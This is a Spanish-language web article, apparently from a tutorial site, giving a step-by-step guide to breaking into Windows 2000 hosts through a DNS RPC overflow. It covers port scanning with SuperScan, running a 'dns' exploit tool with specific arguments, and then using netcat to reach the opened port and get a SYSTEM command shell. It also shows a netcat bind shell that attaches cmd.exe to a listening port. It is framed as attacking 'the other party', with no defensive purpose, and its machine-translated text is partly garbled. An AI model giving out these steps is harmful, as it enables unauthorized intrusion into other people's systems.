Red de conocimiento informático - Material del sitio web - Cómo utilizar la vulnerabilidad DNS para invadir

Cómo utilizar la vulnerabilidad DNS para invadir

La premisa es que los puertos 53 y 445 deben estar abiertos. 1. Seleccione superscan para escanear, verifique los puertos 53 y 445 en la lista de puertos y luego seleccione el segmento de host para escanear.

2. Seleccione el host con los puertos 53 y 445 e ingrese dns -t ip en cmd para escanear el host en busca de puertos de vulnerabilidad específicos. "1028: Vulnerabilidad" significa que existe una vulnerabilidad de desbordamiento. os:window 2000" indica que el tipo de sistema es ventana 2000.

3. Ejecute dns -t 2000all ip 1028 para desbordar el host de destino. conexión al puerto tcp del host de destino establecida con éxito conectado al puerto tcp del host,

vinculado exitosamente a la vulnerabilidad La interfaz dcerpc se ha conectado al puerto rpc de la otra parte, resultado de la huella digital del sistema operativo: Windows 2000

La huella digital del sistema identifica a la otra parte como el sistema wind2000, ataque enviado, verifique el puerto 1100. El código de ataque se envió exitosamente y se realizan intentos de conectarse al puerto 1100. Cuando aparece la última instrucción, significa que vamos a tener éxito.

4. ¿Cómo conectarnos al puerto 1100 de la otra parte? Por supuesto, tenemos que usar nc.

5. El nombre completo de nc es "netcat", que es una "navaja suiza" muy simple y fácil de usar basada en el protocolo tcp/ip (modelo c/s). Estas son algunas de sus funciones comunes:

1. nc.exe -vv -l -p 6069 significa escuchar en el puerto local 6069. -vv: muestra información detallada. -l: monitorear y monitorear la información entrante. -p:

Número de puerto utilizado para el monitoreo.

2. Como nos encontramos, la otra parte ha abierto un puerto. Él está esperando que nos conectemos. ¿Qué pasará si nos conectamos? Por supuesto, es un shell con permisos del sistema.

nc.exe -vv 127.0.0.1 5257, conéctese al puerto 5257 con ip 127.0.0.1.

3. También puede vincular un shell mientras escucha el puerto localmente, lo que equivale a un servidor telnet. Por lo general, este comando se ejecuta en el asador y luego, cuando nos conectamos a él, podemos obtener el

shell. nc.exe -l -p 5257 -t -e cmd.exe, escuche en el puerto local 5257 y vincule cmd.exe. La función de -e es la orientación del programa. -t responde en forma de telnet

.

4. Se puede utilizar para enviar manualmente paquetes de datos (generalmente 80) al puerto del host, nc.exe -vv 127.0.0.1 80

.

6. Después de presentar los cuatro métodos comunes de nc.exe, ahora sabe cómo usar nc para conectarse al puerto 1100 de la otra parte. Usamos nc -vv 127.0.0.1 1100 para conectarnos a la otra parte. puerto 1100 del grupo.

Obtuve con éxito un cmdshell con permisos del sistema y ahora puedo hacer lo que quiera.